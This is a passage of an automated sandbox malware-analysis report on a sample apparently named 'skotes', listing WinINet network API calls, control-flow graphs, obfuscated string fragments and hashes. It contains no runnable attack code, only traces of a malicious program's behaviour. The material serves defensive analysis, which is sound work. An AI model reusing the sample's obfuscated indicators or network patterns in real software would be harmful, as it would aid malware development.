                                                                                                                                        • InternetReadFile.WININET(?,?,000003FF,?), ref: 00DAC0A7
                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 00DAC187
                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 00DAC18F
                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 00DAC197
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2955176966.0000000000DA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2955106938.0000000000DA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955176966.0000000000E02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955369598.0000000000E09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.0000000000E0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.0000000000F91000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.000000000106F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.000000000109D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.00000000010A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.00000000010B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959206171.00000000010B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959554699.000000000124E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959617390.0000000001250000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_da0000_skotes.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSendSleep
                                                                                                                                        • String ID: 8HJUeIfzLo==$8HJUeMD Lq5=$RE1NXF==$RmNn$invalid stoi argument$stoi argument out of range
                                                                                                                                        • API String ID: 2167506142-2254971868
                                                                                                                                        • Opcode ID: fad9d5ba246b21973f6f5634f26df0647252a4552054017a0fcbf4729115ecab
                                                                                                                                        • Instruction ID: 1141ce8f4eaa3a59a04a0d4be7bf20801a36d5cde0aaba0165be609eefc9499b
                                                                                                                                        • Opcode Fuzzy Hash: fad9d5ba246b21973f6f5634f26df0647252a4552054017a0fcbf4729115ecab
                                                                                                                                        • Instruction Fuzzy Hash: 9CB1E4B16102189BDF24CF28CC84BED7BA9EF42314F548199F509A72D1DB719AC4CBB5

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1464 dae530-dae843 call db7a00 call da5c10 call db7a00 call da5c10 call db9280 call db8320 call db8220 call db8320 call db7a00 * 3 call dabe30 call db7a00 * 2 call da5c10 call da8580 1502 daea1a-daea62 1464->1502 1503 dae8ce-dae9ec 1464->1503 1502->1503 1507 daea8f-daea96 call dbd663 1502->1507 1512 daea99-daeab2 call dbcff1 1503->1512 1513 dae9f2-dae9fe 1503->1513 1507->1512 1513->1507 1515 daea04-daea12 1513->1515 1515->1502 1517 daeab8-daed97 call dd6c6a * 2 call db7a00 call da5c10 call db83c0 call db8220 call db7a00 call da5c10 call db83c0 call db8220 1515->1517 1547 daed9d-daee79 1517->1547 1552 daf5bb-daf66c call db80c0 1547->1552 1553 daf273-daf28b 1547->1553 1552->1553 1557 daf699-daf6a0 call dbd663 1552->1557 1554 daf6a3-daf6b6 1553->1554 1555 daf291-daf29d 1553->1555 1555->1557 1558 daf2a3-daf2b1 1555->1558 1557->1554 1558->1552 1562 daf6cb-daf962 call dd6c6a call db7a00 call da5c10 call db7a00 * 4 call dae530 call db80c0 call db7a00 call db80c0 * 2 1558->1562 1595 daf98c-daf9a5 call dbcff1 1562->1595 1596 daf964-daf970 1562->1596 1597 daf982-daf989 call dbd663 1596->1597 1598 daf972-daf980 1596->1598 1597->1595 1598->1597 1600 daf9ab-dafb15 call dd6c6a call db7a00 call da5c10 call db7a00 * 4 call dae530 1598->1600 1624 dafb3f-dafb4e 1600->1624 1625 dafb17-dafb23 1600->1625 1626 dafb35-dafb3c call dbd663 1625->1626 1627 dafb25-dafb33 1625->1627 1626->1624 1627->1626 1628 dafb4f-dafc6f call dd6c6a call db7a00 call da9580 call da9230 call db8320 1627->1628 1643 dafc70-dafc75 1628->1643 1643->1643 1644 dafc77-db0860 call db80c0 call db7a00 * 2 call dac360 call dd6729 call db7a00 call da5c10 call db7a00 * 4 call dae530 1643->1644 1678 db088a-db08a5 call dbcff1 1644->1678 1679 db0862-db086e 1644->1679 1681 db0880-db0887 call dbd663 1679->1681 1682 db0870-db087e 1679->1682 1681->1678 1682->1681 1684 db08ce-db1537 call dd6c6a call db7a00 call da5c10 call db7a00 * 4 call dae530 1682->1684
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2955176966.0000000000DA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2955106938.0000000000DA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955176966.0000000000E02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955369598.0000000000E09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.0000000000E0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.0000000000F91000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.000000000106F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.000000000109D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.00000000010A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.00000000010B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959206171.00000000010B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959554699.000000000124E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959617390.0000000001250000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_da0000_skotes.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: #$111$246122658369$9c9aa5$GnNoc2Hc$L1$MGE+$MQ==$UA==$WDw=$WTs=$WTw=
                                                                                                                                        • API String ID: 0-734524360
                                                                                                                                        • Opcode ID: 4ba4a99e01080d62b5c6750a892490fdbcdb30dbc9e24f511b8f9cfe67242e72
                                                                                                                                        • Instruction ID: a3de60f6088ec1c4c386b003b08aa14966f9862f5082bbe52f3fd55dcbeff6a6
                                                                                                                                        • Opcode Fuzzy Hash: 4ba4a99e01080d62b5c6750a892490fdbcdb30dbc9e24f511b8f9cfe67242e72
                                                                                                                                        • Instruction Fuzzy Hash: 9582A070904288DBEF14EF68C9597DEBFB5EB46304F508588E805673C2D7759A88CBB2
                                                                                                                                        APIs
                                                                                                                                        • ___std_exception_copy.LIBVCRUNTIME ref: 00DA24BE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2955176966.0000000000DA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2955106938.0000000000DA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955176966.0000000000E02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955369598.0000000000E09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.0000000000E0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.0000000000F91000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.000000000106F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.000000000109D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.00000000010A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.00000000010B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959206171.00000000010B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959554699.000000000124E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959617390.0000000001250000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_da0000_skotes.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ___std_exception_copy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2659868963-0
                                                                                                                                        • Opcode ID: 15692a6fc18d01ef03b1e9d6b986c1e4400f30f64f1bd7876238dcf8b2279223
                                                                                                                                        • Instruction ID: 0b594162381994359337df9c9722fae0b05655b4d99db6146c6cc2854adff185
                                                                                                                                        • Opcode Fuzzy Hash: 15692a6fc18d01ef03b1e9d6b986c1e4400f30f64f1bd7876238dcf8b2279223
                                                                                                                                        • Instruction Fuzzy Hash: 4C51C172A04706CFEB15CF59D8856AEB7F6FB18314F24812AE40AEB251E335D984CF60

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 0 db3640-db3679 1 db367f-db36cf call db80c0 0->1 2 db4250-db4256 0->2 13 db4327 call db8200 1->13 14 db36d5-db371b call db80c0 1->14 4 db4258-db4264 2->4 5 db4284-db429c 2->5 7 db427a-db4281 call dbd663 4->7 8 db4266-db4274 4->8 9 db42ca-db42e2 5->9 10 db429e-db42aa 5->10 7->5 8->7 17 db4363 call dd6c6a 8->17 15 db430c-db4326 call dbcff1 9->15 16 db42e4-db42f0 9->16 11 db42ac-db42ba 10->11 12 db42c0-db42c7 call dbd663 10->12 11->12 11->17 12->9 31 db432c call db8200 13->31 14->13 33 db3721-db375f call db80c0 14->33 22 db4302-db4309 call dbd663 16->22 23 db42f2-db4300 16->23 22->15 23->17 23->22 35 db4331 call dd6c6a 31->35 33->13 40 db3765-db37b0 call db80c0 call db7a00 call da5c10 33->40 39 db4336 call dd6c6a 35->39 43 db433b call db8200 39->43 54 db37b2 40->54 55 db37b4-db37e9 call db8ba0 40->55 47 db4340 call dd6c6a 43->47 51 db4345 call dd6c6a 47->51 57 db434a-db434f call dbc199 51->57 54->55 55->31 60 db37ef-db381e call db80c0 55->60 61 db4354 call dd6c6a 57->61 67 db384f-db3874 call da98f0 60->67 68 db3820-db382f 60->68 65 db4359-db435e call dbc1d9 61->65 65->17 75 db387a-db38e2 call db7a00 call da5c10 call db80c0 67->75 76 db3d58-db3d5e 67->76 69 db3831-db383f 68->69 70 db3845-db384c call dbd663 68->70 69->35 69->70 70->67 110 db38e6-db391d call db9470 75->110 111 db38e4 75->111 77 db3d8c-db3d92 76->77 78 db3d60-db3d6c 76->78 81 db3dc0-db3dc6 77->81 82 db3d94-db3da0 77->82 83 db3d6e-db3d7c 78->83 84 db3d82-db3d89 call dbd663 78->84 89 db3dc8-db3dd4 81->89 90 db3df4-db3e0c 81->90 87 db3da2-db3db0 82->87 88 db3db6-db3dbd call dbd663 82->88 83->61 83->84 84->77 87->61 87->88 88->81 96 db3dea-db3df1 call dbd663 89->96 97 db3dd6-db3de4 89->97 91 db3e0e-db3e1d 90->91 92 db3e3d-db3e43 90->92 98 db3e1f-db3e2d 91->98 99 db3e33-db3e3a call dbd663 91->99 92->2 101 db3e49-db3e55 92->101 96->90 97->61 97->96 98->61 98->99 99->92 106 db3e5b-db3e69 101->106 107 db4246-db424d call dbd663 101->107 106->61 113 db3e6f 106->113 107->2 117 db394a-db3957 110->117 118 db391f-db392a 110->118 111->110 113->107 121 db3959-db3968 117->121 122 db3988-db398f 117->122 119 db392c-db393a 118->119 120 db3940-db3947 call dbd663 118->120 119->39 119->120 120->117 123 db396a-db3978 121->123 124 db397e-db3985 call dbd663 121->124 125 db3b53-db3b83 call dd75f6 call dd8ab6 122->125 126 db3995-db39b7 122->126 123->39 123->124 124->122 125->57 139 db3b89-db3b8c 125->139 126->43 129 db39bd-db39ef call db80c0 call daad70 126->129 142 db39f1-db39f7 129->142 143 db3a47-db3a50 129->143 139->65 141 db3b92-db3b95 139->141 141->76 144 db3b9b 141->144 147 db39f9-db3a05 142->147 148 db3a25-db3a44 142->148 145 db3a52-db3a61 143->145 146 db3a81-db3ac1 call db7a00 * 2 call da49a0 143->146 149 db3c8d-db3d4d call db80c0 call db7a00 call da5c10 call db7a00 * 5 call db1ec0 144->149 150 db3ba2-db3c67 call db80c0 call db7a00 call da5c10 call db7a00 * 5 144->150 151 db3f42-db3fa4 call db7a00 * 4 call db2f10 144->151 152 db3e74-db3f3d call db80c0 call db7a00 call da5c10 call db7a00 * 5 144->152 153 db3a63-db3a71 145->153 154 db3a77-db3a7e call dbd663 145->154 191 db3b19-db3b22 146->191 192 db3ac3-db3ac9 146->192 156 db3a1b-db3a22 call dbd663 147->156 157 db3a07-db3a15 147->157 148->143 241 db3d52 149->241 238 db3c6b-db3c7d call db7a00 call db08e0 150->238 151->76 152->238 153->47 153->154 154->146 156->148 157->47 157->156 191->125 198 db3b24-db3b33 191->198 194 db3acb-db3ad7 192->194 195 db3af7-db3b16 192->195 201 db3ad9-db3ae7 194->201 202 db3aed-db3af4 call dbd663 194->202 195->191 205 db3b49-db3b50 call dbd663 198->205 206 db3b35-db3b43 198->206 201->51 201->202 202->195 205->125 206->51 206->205 244 db3c82-db3c88 238->244 241->76 244->76
                                                                                                                                        APIs
                                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00DB434F
                                                                                                                                          • Part of subcall function 00DB7A00: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 00DB7AEC
                                                                                                                                          • Part of subcall function 00DB7A00: __Cnd_destroy_in_situ.LIBCPMT ref: 00DB7AF8
                                                                                                                                          • Part of subcall function 00DB7A00: __Mtx_destroy_in_situ.LIBCPMT ref: 00DB7B01
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2955176966.0000000000DA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2955106938.0000000000DA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955176966.0000000000E02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955369598.0000000000E09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.0000000000E0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.0000000000F91000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.000000000106F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.000000000109D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.00000000010A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.00000000010B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959206171.00000000010B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959554699.000000000124E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959617390.0000000001250000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_da0000_skotes.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situXinvalid_argumentstd::_
                                                                                                                                        • String ID: 2I0$ 3I3eB==$ GE0$ jS=$"$246122658369$5120$8WI0$9250$93E0$9HQ0$9c9aa5$Fw==$Hykl$KCWUOl==$MGE+$MGI+$V2Te$VXA0$VXQ0$Vmc0$WGS0$WGpm$WX f$aWW0$anE0$invalid stoi argument$stoi argument out of range
                                                                                                                                        • API String ID: 4234742559-385961153
                                                                                                                                        • Opcode ID: beac0d9ada0503a369845f13080d9e55e81051431de2be8e444b196d69800d63
                                                                                                                                        • Instruction ID: 8b2a9c26024de49900634c7dcba07a0ca4103de1a5e8ecd4b900061730f973df
                                                                                                                                        • Opcode Fuzzy Hash: beac0d9ada0503a369845f13080d9e55e81051431de2be8e444b196d69800d63
                                                                                                                                        • Instruction Fuzzy Hash: 1152D171A00248DBDB18EF68CD8A7DDBBB5EF45300F54458CE446A7282DB359B84CBB2
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00DB7A00: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 00DB7AEC
                                                                                                                                          • Part of subcall function 00DB7A00: __Cnd_destroy_in_situ.LIBCPMT ref: 00DB7AF8
                                                                                                                                          • Part of subcall function 00DB7A00: __Mtx_destroy_in_situ.LIBCPMT ref: 00DB7B01
                                                                                                                                          • Part of subcall function 00DABE30: Sleep.KERNEL32(000005DC), ref: 00DABEB8
                                                                                                                                          • Part of subcall function 00DABE30: InternetOpenW.WININET(00DF8DC8,00000000,00000000,00000000,00000000), ref: 00DABEC8
                                                                                                                                          • Part of subcall function 00DABE30: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00DABEEC
                                                                                                                                          • Part of subcall function 00DABE30: HttpOpenRequestA.WININET(?,00000000), ref: 00DABF36
                                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00DB4F92
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2955176966.0000000000DA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2955106938.0000000000DA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955176966.0000000000E02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955369598.0000000000E09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.0000000000E0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.0000000000F91000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.000000000106F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.000000000109D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.00000000010A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.00000000010B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959206171.00000000010B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959554699.000000000124E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959617390.0000000001250000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_da0000_skotes.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequestSleepXinvalid_argumentstd::_
                                                                                                                                        • String ID: 2I0$ 3I3eB==$ GE0$ jS=$246122658369$8WI0$9250$93E0$9HQ0$9c9aa5$Fw==$KCWUOl==$MGE+$MGI+$VXA0$VXQ0$Vmc0$WGS0$aWW0$anE0$stoi argument out of range
                                                                                                                                        • API String ID: 4201286991-1982281295
                                                                                                                                        • Opcode ID: a528752745d4a8d8f0705539267f823bf3767fc7396edabbb92f2e6d0687e06c
                                                                                                                                        • Instruction ID: acfe359f05da8cca9a766439d6cb21d392d3416c720f3d27a4086c90cbf6d3da
                                                                                                                                        • Opcode Fuzzy Hash: a528752745d4a8d8f0705539267f823bf3767fc7396edabbb92f2e6d0687e06c
                                                                                                                                        • Instruction Fuzzy Hash: 2123C271A00258CBDB19DB28CD897DDBBB6DB81304F5481D8E04AA72D6EB359F84CF61

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1018 db2f10-db351c call db7a00 call da5c10 call db7a00 * 4 call dae530 1035 db354a-db3562 1018->1035 1036 db351e-db352a 1018->1036 1039 db3590-db35a8 1035->1039 1040 db3564-db3570 1035->1040 1037 db352c-db353a 1036->1037 1038 db3540-db3547 call dbd663 1036->1038 1037->1038 1043 db3639-db3679 call dd6c6a 1037->1043 1038->1035 1041 db35aa-db35b6 1039->1041 1042 db35d2-db35ea 1039->1042 1045 db3572-db3580 1040->1045 1046 db3586-db358d call dbd663 1040->1046 1049 db35c8-db35cf call dbd663 1041->1049 1050 db35b8-db35c6 1041->1050 1051 db35ec-db35f8 1042->1051 1052 db3614-db362e call dbcff1 1042->1052 1065 db367f-db36cf call db80c0 1043->1065 1066 db4250-db4256 1043->1066 1045->1043 1045->1046 1046->1039 1049->1042 1050->1043 1050->1049 1057 db360a-db3611 call dbd663 1051->1057 1058 db35fa-db3608 1051->1058 1057->1052 1058->1043 1058->1057 1077 db4327 call db8200 1065->1077 1078 db36d5-db371b call db80c0 1065->1078 1068 db4258-db4264 1066->1068 1069 db4284-db429c 1066->1069 1071 db427a-db4281 call dbd663 1068->1071 1072 db4266-db4274 1068->1072 1073 db42ca-db42e2 1069->1073 1074 db429e-db42aa 1069->1074 1071->1069 1072->1071 1081 db4363 call dd6c6a 1072->1081 1079 db430c-db4326 call dbcff1 1073->1079 1080 db42e4-db42f0 1073->1080 1075 db42ac-db42ba 1074->1075 1076 db42c0-db42c7 call dbd663 1074->1076 1075->1076 1075->1081 1076->1073 1095 db432c call db8200 1077->1095 1078->1077 1097 db3721-db375f call db80c0 1078->1097 1086 db4302-db4309 call dbd663 1080->1086 1087 db42f2-db4300 1080->1087 1086->1079 1087->1081 1087->1086 1099 db4331 call dd6c6a 1095->1099 1097->1077 1104 db3765-db37b0 call db80c0 call db7a00 call da5c10 1097->1104 1103 db4336 call dd6c6a 1099->1103 1107 db433b call db8200 1103->1107 1118 db37b2 1104->1118 1119 db37b4-db37e9 call db8ba0 1104->1119 1111 db4340 call dd6c6a 1107->1111 1115 db4345 call dd6c6a 1111->1115 1121 db434a-db434f call dbc199 1115->1121 1118->1119 1119->1095 1124 db37ef-db381e call db80c0 1119->1124 1125 db4354 call dd6c6a 1121->1125 1131 db384f-db3874 call da98f0 1124->1131 1132 db3820-db382f 1124->1132 1129 db4359-db435e call dbc1d9 1125->1129 1129->1081 1139 db387a-db38e2 call db7a00 call da5c10 call db80c0 1131->1139 1140 db3d58-db3d5e 1131->1140 1133 db3831-db383f 1132->1133 1134 db3845-db384c call dbd663 1132->1134 1133->1099 1133->1134 1134->1131 1174 db38e6-db391d call db9470 1139->1174 1175 db38e4 1139->1175 1141 db3d8c-db3d92 1140->1141 1142 db3d60-db3d6c 1140->1142 1145 db3dc0-db3dc6 1141->1145 1146 db3d94-db3da0 1141->1146 1147 db3d6e-db3d7c 1142->1147 1148 db3d82-db3d89 call dbd663 1142->1148 1153 db3dc8-db3dd4 1145->1153 1154 db3df4-db3e0c 1145->1154 1151 db3da2-db3db0 1146->1151 1152 db3db6-db3dbd call dbd663 1146->1152 1147->1125 1147->1148 1148->1141 1151->1125 1151->1152 1152->1145 1160 db3dea-db3df1 call dbd663 1153->1160 1161 db3dd6-db3de4 1153->1161 1155 db3e0e-db3e1d 1154->1155 1156 db3e3d-db3e43 1154->1156 1162 db3e1f-db3e2d 1155->1162 1163 db3e33-db3e3a call dbd663 1155->1163 1156->1066 1165 db3e49-db3e55 1156->1165 1160->1154 1161->1125 1161->1160 1162->1125 1162->1163 1163->1156 1170 db3e5b-db3e69 1165->1170 1171 db4246-db424d call dbd663 1165->1171 1170->1125 1177 db3e6f 1170->1177 1171->1066 1181 db394a-db3957 1174->1181 1182 db391f-db392a 1174->1182 1175->1174 1177->1171 1185 db3959-db3968 1181->1185 1186 db3988-db398f 1181->1186 1183 db392c-db393a 1182->1183 1184 db3940-db3947 call dbd663 1182->1184 1183->1103 1183->1184 1184->1181 1187 db396a-db3978 1185->1187 1188 db397e-db3985 call dbd663 1185->1188 1189 db3b53-db3b83 call dd75f6 call dd8ab6 1186->1189 1190 db3995-db39b7 1186->1190 1187->1103 1187->1188 1188->1186 1189->1121 1203 db3b89-db3b8c 1189->1203 1190->1107 1193 db39bd-db39ef call db80c0 call daad70 1190->1193 1206 db39f1-db39f7 1193->1206 1207 db3a47-db3a50 1193->1207 1203->1129 1205 db3b92-db3b95 1203->1205 1205->1140 1208 db3b9b 1205->1208 1211 db39f9-db3a05 1206->1211 1212 db3a25-db3a44 1206->1212 1209 db3a52-db3a61 1207->1209 1210 db3a81-db3ac1 call db7a00 * 2 call da49a0 1207->1210 1213 db3c8d-db3d52 call db80c0 call db7a00 call da5c10 call db7a00 * 5 call db1ec0 1208->1213 1214 db3ba2-db3c67 call db80c0 call db7a00 call da5c10 call db7a00 * 5 1208->1214 1215 db3f42-db3fa4 call db7a00 * 4 call db2f10 1208->1215 1216 db3e74-db3f3d call db80c0 call db7a00 call da5c10 call db7a00 * 5 1208->1216 1217 db3a63-db3a71 1209->1217 1218 db3a77-db3a7e call dbd663 1209->1218 1255 db3b19-db3b22 1210->1255 1256 db3ac3-db3ac9 1210->1256 1220 db3a1b-db3a22 call dbd663 1211->1220 1221 db3a07-db3a15 1211->1221 1212->1207 1213->1140 1302 db3c6b-db3c74 call db7a00 1214->1302 1215->1140 1216->1302 1217->1111 1217->1218 1218->1210 1220->1212 1221->1111 1221->1220 1255->1189 1262 db3b24-db3b33 1255->1262 1258 db3acb-db3ad7 1256->1258 1259 db3af7-db3b16 1256->1259 1265 db3ad9-db3ae7 1258->1265 1266 db3aed-db3af4 call dbd663 1258->1266 1259->1255 1269 db3b49-db3b50 call dbd663 1262->1269 1270 db3b35-db3b43 1262->1270 1265->1115 1265->1266 1266->1259 1269->1189 1270->1115 1270->1269 1306 db3c79-db3c7d call db08e0 1302->1306 1308 db3c82-db3c88 1306->1308 1308->1140
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2955176966.0000000000DA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2955106938.0000000000DA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955176966.0000000000E02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955369598.0000000000E09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.0000000000E0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.0000000000F91000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.000000000106F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.000000000109D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.00000000010A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.00000000010B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959206171.00000000010B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959554699.000000000124E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959617390.0000000001250000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
